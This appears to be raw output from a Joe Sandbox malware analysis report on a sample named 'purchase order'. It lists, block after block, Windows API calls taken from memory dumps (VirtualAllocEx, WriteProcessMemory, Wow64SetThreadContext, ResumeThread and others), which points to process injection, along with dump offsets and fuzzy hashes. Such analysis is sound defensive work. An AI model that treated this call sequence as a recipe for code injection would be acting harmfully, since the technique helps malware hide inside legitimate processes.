                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0

                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0235B41E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1839022658.0000000002350000.00000040.00000800.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2350000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0

                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0235D66E,?,?,?,?,?), ref: 0235D72F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1839022658.0000000002350000.00000040.00000800.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2350000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0

                                                                                                              APIs
                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 04A14381
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844040022.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4a10000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CallProcWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2714655100-0

                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 023559C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1839022658.0000000002350000.00000040.00000800.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2350000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0

                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 023559C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1839022658.0000000002350000.00000040.00000800.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2350000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              APIs
                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 068E6BB0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 1726664587-0
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 068E6AD0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 068E6AD0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              APIs
                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 068E8F75
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessagePost
                                                                                                              • String ID:
                                                                                                              • API String ID: 410705778-0
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0235D66E,?,?,?,?,?), ref: 0235D72F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1839022658.0000000002350000.00000040.00000800.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2350000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 068E6926
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              APIs
                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 068E6BB0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 1726664587-0
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 068E6926
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0235D66E,?,?,?,?,?), ref: 0235D72F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1839022658.0000000002350000.00000040.00000800.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2350000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 068E69EE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              APIs
                                                                                                              • ResumeThread.KERNELBASE(00000004), ref: 068E685A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 947044025-0
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 068E69EE
Memory Dump Source
• Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• ResumeThread.KERNELBASE(00000004), ref: 068E685A
Memory Dump Source
• Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 0235B41E
Memory Dump Source
• Source File: 00000000.00000002.1839022658.0000000002350000.00000040.00000800.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2350000_purchase order.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 068E8F75
Memory Dump Source
• Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 068E8F75
Memory Dump Source
• Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6f255ff0ab25ab985c38aa56d99cfee123ff8e2d39659e5ff347e1950e16cf2b
                                                                                                              • Instruction ID: e62b931ab7c082d048d2a9baa87adca96942ffa256a85905cc7dde08395df7d2
                                                                                                              • Opcode Fuzzy Hash: 6f255ff0ab25ab985c38aa56d99cfee123ff8e2d39659e5ff347e1950e16cf2b
                                                                                                              • Instruction Fuzzy Hash: 31411530B142589FDB14DBA9C894AAEBBF6BF49705F1540A9F605EB361DA31E801CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ae25014a3bb05a8a0432a93bf1a32869e32db407b7335e9b7a7416da741f0671
                                                                                                              • Instruction ID: 78e9c7c8501f7c5b4b11cccf13c7482783ae18a6d9e0b5a05403336705ebec78
                                                                                                              • Opcode Fuzzy Hash: ae25014a3bb05a8a0432a93bf1a32869e32db407b7335e9b7a7416da741f0671
                                                                                                              • Instruction Fuzzy Hash: 4A418735A01109CFEB28EFB4C8547EEBAB1EB88318F144469E60567354DF34A986CBE5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4bd3cea8f803e538039a927849bac2114316bcd167a77c9e6c4be5f7aa554d97
                                                                                                              • Instruction ID: ca79c909d3bdfad0d2b80ac7f588f76f762e542df9cbe83c03a0af702a2ffb2b
                                                                                                              • Opcode Fuzzy Hash: 4bd3cea8f803e538039a927849bac2114316bcd167a77c9e6c4be5f7aa554d97
                                                                                                              • Instruction Fuzzy Hash: F0412770600219DFDF059FA5D844AAEBBA6FF98300F148525F9129B3A4DB34ED56CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8cde9ad1007642347ada2c7bfc5100f91ad04024ab38ad90ee8d32ae0b200a1a
                                                                                                              • Instruction ID: 432c0e422118211b86723e084596622b1edf3422cf46e1bd9bf68c3aa77b31fa
                                                                                                              • Opcode Fuzzy Hash: 8cde9ad1007642347ada2c7bfc5100f91ad04024ab38ad90ee8d32ae0b200a1a
                                                                                                              • Instruction Fuzzy Hash: FB416D319106099FDB00EFA8D9949DDBBB1FF49301F00822AF945B7250FB30AA89CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 88a2e24dcc7579f4813d90a2ee0f2d97181890d8362d5d1a34838b14ff56df8d
                                                                                                              • Instruction ID: 72dba51310d5c08b02f7223d21030687a0bce549f37432993cbf25fc218c16f4
                                                                                                              • Opcode Fuzzy Hash: 88a2e24dcc7579f4813d90a2ee0f2d97181890d8362d5d1a34838b14ff56df8d
                                                                                                              • Instruction Fuzzy Hash: D0315070B002159FDB14AFBAC9549BFBBFAEFC4344B10882AA515D7251EB34ED058790
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d06b341cf7999fe32d26a849f57d755957580c497254324ceebcbb1cdd760db3
                                                                                                              • Instruction ID: 1667f2db59f2ffbe2c9af32a92649281a63037b75f75c3a7439a713b4a89a61c
                                                                                                              • Opcode Fuzzy Hash: d06b341cf7999fe32d26a849f57d755957580c497254324ceebcbb1cdd760db3
                                                                                                              • Instruction Fuzzy Hash: 8541D2B1D00209DBDB20DFE9C984ADDBBB5BF48304F24842AE418BB215D7756A46CF91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bd88c2acabf506361dafeb187fbf254a6ac98145519e2ea9bd000b82c591f688
                                                                                                              • Instruction ID: 92af481d2ae9718c2c68831a6357d2225c0841f4e2b9eea8cf6f769b1d1d3ad8
                                                                                                              • Opcode Fuzzy Hash: bd88c2acabf506361dafeb187fbf254a6ac98145519e2ea9bd000b82c591f688
                                                                                                              • Instruction Fuzzy Hash: 8641B2B1D00209DBDB24DFE9C984ADDBBB5BF48304F64802AE518BB214D7756A46CF91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e494c78df1d769c1dee0127110ae08dfa65ba3750d13c8e195a9be088eebf4a3
                                                                                                              • Instruction ID: c6559ca43cd9e1e921ddc5199751f517081c53930f0be70d63f135535946db2c
                                                                                                              • Opcode Fuzzy Hash: e494c78df1d769c1dee0127110ae08dfa65ba3750d13c8e195a9be088eebf4a3
                                                                                                              • Instruction Fuzzy Hash: 8241BFB0D1035C9BDB14CFDAC884A9EFBB5BF89714F20812AE418BB220D774A845CF91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 78bf7c23d75b765d9a7b9ee47633fd4575cdb20d260381dd20eea33a4b24c51b
                                                                                                              • Instruction ID: 71b9c5babd9f0562fb01096d6cfe7124dec2677af863d2747f2f9a4fe3bca1f4
                                                                                                              • Opcode Fuzzy Hash: 78bf7c23d75b765d9a7b9ee47633fd4575cdb20d260381dd20eea33a4b24c51b
                                                                                                              • Instruction Fuzzy Hash: FF31B974900105CFEB28EFB4C8557EE7BB1EB48318F108469D60567384DE35A9868BE6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a06aa6c9c8839cddedfa10638d337e4bb34d98178c3867c47ef945fb9fb1f8f1
                                                                                                              • Instruction ID: 5954cd0eedab45574e6f56653782c80f5228f45d2864ad374ec90d86ef411bb7
                                                                                                              • Opcode Fuzzy Hash: a06aa6c9c8839cddedfa10638d337e4bb34d98178c3867c47ef945fb9fb1f8f1
                                                                                                              • Instruction Fuzzy Hash: 6F310171A012189FDF01EFA8DC449DD7FB2EF49310F04406AE901AB262D730ED56CB61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: aae3e18db78af9374cf6d64b9f246fd34ad5ff64d2b543f85a8cc86f4f8284a9
                                                                                                              • Instruction ID: 6cb2a4a686ec66db0922ddf0657c2e7ef3d8d659f7a2198ec82cd8c88d29d730
                                                                                                              • Opcode Fuzzy Hash: aae3e18db78af9374cf6d64b9f246fd34ad5ff64d2b543f85a8cc86f4f8284a9
                                                                                                              • Instruction Fuzzy Hash: 1431D675A10605DFDB14EFA4C8549EDBBB1FF89304F048129F5066B364EB70A986DF80
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fd40fc805a4db854bd4afd80ae543a5464b58fc107fa086e30943968a145e5f2
                                                                                                              • Instruction ID: 950ddd9c260aafd225ddf4460a968a6f713746c1aff6cf450e3f875c6be516d8
                                                                                                              • Opcode Fuzzy Hash: fd40fc805a4db854bd4afd80ae543a5464b58fc107fa086e30943968a145e5f2
                                                                                                              • Instruction Fuzzy Hash: 2C310675A50219DFDB04DFA9D994EEDB7B9FF88704F1182A9E915AB360D730A800CF90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fb85f3a441cb1c2c247b88fead4ffaf79c008df70e53d0e299e6a56427180d0f
                                                                                                              • Instruction ID: dba72ad1b58165553f68e73b9341a7a5853a35c1f6e54d3bc4a0ba6ef8dfa910
                                                                                                              • Opcode Fuzzy Hash: fb85f3a441cb1c2c247b88fead4ffaf79c008df70e53d0e299e6a56427180d0f
                                                                                                              • Instruction Fuzzy Hash: E521D3303017008BE329ABB5895066677EAAFC5249705487DE947CB3A1EF69E807C751
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bfab9d4fca799fbd34d226c9cfc9ec4d35cb8e2379c4a1d092a513a77cf01a11
                                                                                                              • Instruction ID: 9956456a5e82a0bcceb8d7bb7727bf48808a81b0f8f7ba5cddfd654b79e80f8e
                                                                                                              • Opcode Fuzzy Hash: bfab9d4fca799fbd34d226c9cfc9ec4d35cb8e2379c4a1d092a513a77cf01a11
                                                                                                              • Instruction Fuzzy Hash: B72138B67102104FEB248F65C8C167FB7EAEBC4314B28806AE646D3665D634F9868751
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 88d5b1f548e9906c99caa98b7a2c864fe02bce2192f52e5bdc80063f3f210dca
                                                                                                              • Instruction ID: 1afe131d7626daa48f4b801abf69ae3390e3ce6c9263be905550df51eb294851
                                                                                                              • Opcode Fuzzy Hash: 88d5b1f548e9906c99caa98b7a2c864fe02bce2192f52e5bdc80063f3f210dca
                                                                                                              • Instruction Fuzzy Hash: 12218371B001159FDB14DFA9CD409BFBBFAAFC4344F14851AE514D3251EB30AA018BA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
Memory Dump Source
• Source File: 00000000.00000002.1838270342.000000000076D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0076D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_76d000_purchase order.jbxd
Memory Dump Source
• Source File: 00000000.00000002.1838380085.000000000077D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0077D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_77d000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ca78977fec8b1d171bed5142847b6d98cf849da9c4dd9ea1dd0f790152f5281a
                                                                                                              • Instruction ID: 034e3496f57f02fa187171c5a2e2bfbf76e2c032725ca0cda450f8bc71460756
                                                                                                              • Opcode Fuzzy Hash: ca78977fec8b1d171bed5142847b6d98cf849da9c4dd9ea1dd0f790152f5281a
                                                                                                              • Instruction Fuzzy Hash: 3E21D071604204EFDF25DF14D980B26BBB5FF88354F24C6A9E94D4B296C33ADC46CA61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1838380085.000000000077D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0077D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77d000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1357ad43f79d67833ab9ca7554b24dcb6fb65d4a1bce5707c2b5925b298c43e8
                                                                                                              • Instruction ID: 42e9a6d3a339cd673889d538baee4d14e7f27b6759e96bb6455ceacf4a789113
                                                                                                              • Opcode Fuzzy Hash: 1357ad43f79d67833ab9ca7554b24dcb6fb65d4a1bce5707c2b5925b298c43e8
                                                                                                              • Instruction Fuzzy Hash: B521DE75604204DFCF24DF24DA84B26BBB5EF88354F24C569E80E4B296C33ADC46CA61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5689d450abbe1256bc05aad37141def6e71594354524d5f51b0893f97ecdee33
                                                                                                              • Instruction ID: c6121d0dcc94d5104c0f9cb3e44cb2fa7c816e3538dcd1ce57dde1ec3f75aa5c
                                                                                                              • Opcode Fuzzy Hash: 5689d450abbe1256bc05aad37141def6e71594354524d5f51b0893f97ecdee33
                                                                                                              • Instruction Fuzzy Hash: 5131F4B0D01258DFEB20DF99C988BCEBFF5AB08314F548559E904BB250D7B56886CF91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dbf3ae21fae57e765221c1bd89171096e8df6b9e6db49d148a549e9c1eefc393
                                                                                                              • Instruction ID: 90a34b6b23de6c6135151f4f6a1d0b3d3209700d118300808200c612c0eb132b
                                                                                                              • Opcode Fuzzy Hash: dbf3ae21fae57e765221c1bd89171096e8df6b9e6db49d148a549e9c1eefc393
                                                                                                              • Instruction Fuzzy Hash: 5B31E0B0D01258DFEB20DFDAC988B9EBFF5AB08314F648159E508BB250D7B56885CF91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 91087aca7cbc970241d19a5cb23bc9ed189cf8b9c79f9dafebc8c5561a86321e
                                                                                                              • Instruction ID: 2717ad1514900fcaad8a160bb2f7e7df419b29d86063996a372ae6a36cae1fea
                                                                                                              • Opcode Fuzzy Hash: 91087aca7cbc970241d19a5cb23bc9ed189cf8b9c79f9dafebc8c5561a86321e
                                                                                                              • Instruction Fuzzy Hash: 0711C2B2E002198F9B11EFB99C404BFB7F7EFC42607144929E519D7340EB30AE0A87A0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
